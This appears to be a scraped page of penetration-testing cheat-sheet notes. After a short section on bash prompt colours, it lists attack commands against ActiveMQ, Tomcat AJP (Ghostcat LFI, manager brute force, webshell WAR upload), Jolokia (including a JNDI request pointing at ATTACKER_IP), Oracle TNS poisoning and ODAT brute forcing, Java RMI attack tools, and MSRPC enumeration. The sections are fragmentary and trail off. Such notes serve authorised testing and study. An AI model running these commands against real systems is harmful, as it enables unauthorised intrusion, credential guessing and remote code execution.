Steinz Security

Value Color 0 Black 1 Red 2 Green 3 Yellow 4 Blue 5 Magenta 6 Cyan 7 White 8 Not used 9 Reset to default color Example green=`tput setaf 2` red=`tput setaf 2` reset=`tput sgr0` echo -e "\n${green}########## Display Text in GREEN Color ########## ${reset} \n" echo -e "\n${red}########## Display Text in RED Color ########## ${reset} \n" Customize Bash Prompt in Linux #Set it permnently sudo nano ~/.bashrc #at the end of the file, paste the below and save it PS1="\e[1;34m[\u - \W]\$ \e[0m" #u = username; \H = hostname; export PS1="\u# " #Hide everything export PS1="\W > " #Show Username with last Directory in color export PS1="\e[0;32m[\u - \W]\$ \e[0m" export PS1="\e[1;34m[\u - \W]\$ \e[0m" • \e[ – Begin color changes • 0;32m – Specify the color code • [\u@\h \W]\$ – This is the code for your normal BASH prompt (username@hostname Workingdirectory $) • \e[0m – Exit color-change mode The first number in the...

  #Commonly Observed on Ports - 32064, 32357, 61616l you will find it together with RMI (1099 Port) & a webserver (6161 - jetty) Nmap Scan nmap -sV -Pn -n -T4 --script amqp-info -p 61616 10.10.10.10 Web server -- http://10.10.10.10:8161/admin -> default creds- admin:admin #Query the server curl -d 'body="Hello World"' "http://10.10.10.10:8161/demo/message/test?type=queue&clientId=consumerA" curl -u admin:admin -d "body=message" http://localhost:8161/api/message/TEST?type=queue Connecting to ActiveMQ (Might require creds) #Download activemq from here unzip filename go to conf/activemq-cli.config --> and update the IP Address broker { local { amqurl = "tcp://10.10.10.10:32064" jmxurl = "service:jmx:rmi:///jndi/rmi://10.10.10.10:1099/jmxrmi" username = "" password = "" prompt-color = "light-blue...

  NMAP nmap -sV --script ajp-auth,ajp-headers,ajp-methods,ajp-request -n -p 8009 10.10.10.10 Ghost Vulnerability - LFI Patached versions: after 9.0.31, 8.5.51, and 7.0.100 git clone https://github.com/doggycheng/CNVD-2020-10487.git python CNVD-2020-10487-Tomcat-Ajp-lfi.py -f /index.jsp 192.168.125.128 AJPY git clone https://github.com/hypn0s/AJPy.git python3 setup.py install #Get Version python tomcat.py version 10.10.10.10 python tomcat.py -v bf -U /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt -P /opt/metasploit-framework/embedded/framework/data/wordlists/tomcat_mgr_default_users.txt /manager/html 10.10.10.10 #Upload WAR File python tomcat.py upload -u tomcat -p tomcat webshell.war 172.17.0.2 #List available applications python tomcat.py list -u tomcat -p tomcat 172.17.0.2 #GHOST LFI CVE exploit python tomcat.py read_file --webapp=examples /WEB-INF/web.xml 172.17.0.2 Other attacks - Rev proxy attack nginx Module abuse ...

  Usually found under - No Default port - can be used under any webserver /jolokia /actuator/jolokia #Get basic Version info and where it is being used curl http://10.10.10.10:8899/jolokia/ #Get the list of functions curl http://10.10.10.10/jolokia/list #Check Vuln Status to AccessLogValve Exploit curl -kL http://10.10.10.10:8080/jolokia/read/Catalina:host=localhost,name=AccessLogValve,type=Valve #Access an instance curl -d '{ "type" : "read", "mbean" : "java.lang:type=Memory", "target" : { "url" : "service:jmx:rmi:///jndi/ldap://ATTACKER_IP:8001/jmxrm" } }' 'http://VICTIM_IP:8080/jolokia/' Jolokia Tool Kit git clone https://github.com/laluka/jolokia-exploitation-toolkit python jolokia-parser.py http://10.10.10.10:8899/jolokia/ | tee jolokia-list.log #Commend EXEC - Based on the output create the command grep createStandardHost jolokia-list.log curl -skg 'http:...

  #nmap nmap -Pn -sV -p1521 --script=oracle* 10.10.10.10 #Check for service Version #Oracle Database 11g 11.1.0.7, 11.2.0.2, and 11.2.0.3, and 10g 10.2.0.3, 10.2.0.4, and 10.2.0.5, #try this exploit GitHub - bongbongco/CVE-2012-1675: Oracle Database TNS Listener Poison Attack Vulnerability nmap -Pn -sT --script=+oracle-tns-poison.nse -p 1521 10.10.10.10 Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP ODAT - Oracle Database Attacking Tool #Download the release https://github.com/quentinhardy/odat/releases/ tar -xvf filename #Run ./odat all -s 10.10.10.10 ./odat all -s 10.10.10.10 -d SID_NAME ./odat all -s 10.10.10.10 -d '' #Check with creds ./odat all -s 192.168.1.254 -p 1521 -d ORCL -U SYS -P password #bruteforce when you know SID ./odat all -s 10.10.10.10 -d '' --accounts-file accounts/accounts_multiple.txt #Enum - Doesn't work if password protected sudo apt install tnscmd10g #Version tnscmd10g version -h 10.10.10.10 #Status tnscmd10g status -h 10.10.10.10 ...

  RMI can be run on any nonstandard port and when RMI is running you will observer one more endpoint port connected to it (find it from nmap easily by running  rmi-dumpregistry  ) #jmxrmi  bound name and its signatures might be vulnerable to MLetMbean Vuln, where MBean that can be used for loading additional MBeans over the network. java.lang.String getVersion() javax.management.remote.rmi.RMIConnection newClient(java.lang.Object arg) Java RMI Registry - Port 1616 nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616 BaRMIe #Download the package from releases https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01 java -jar BaRMIe.jar -enum 192.168.1.11 5000 java -jar BaRMIe.jar -attack 192.168.1.11 5000 Remote Method Guesser https://github.com/qtc-de/remote-method-guesser java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum #Look for Vulnerabilities java -jar rmg.jar enum 10.10.10.10 5000 #Get bound names ...

  rpcdump.py 10.10.10.10 -p 593 TCP 135 is the Endpoint Mapper and Component Object Model (COM) Service Control Manager. There’s a tool called rpcmap.py from Impacket that will show these mappings. This tool needs a stringbinding argument to enable it’s connection. The examples from -h are: stringbinding String binding to connect to MSRPC interface, for example: ncacn_ip_tcp:192.168.0.1[135] ncacn_np:192.168.0.1[\pipe\spoolss] ncacn_http:192.168.0.1[593] ncacn_http:[6001,RpcProxy=exchange.contoso.com:443] ncacn_http:localhost[3388,RpcProxy=rds.contoso:443] rpcmap.py 'ncacn_ip_tcp:10.10.10.10' reference for MS-DCOM #if you find IOXIDResolver in the UUID's you can run below script to #list network interfaces git clone https://github.com/mubix/IOXIDResolver.git cd IOXIDResolver python3 -m pip install -r requirements.txt python IOXIDResolver.py -t 10.10.10.10 Other things to check reg.py 10.10.10.10 query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s service...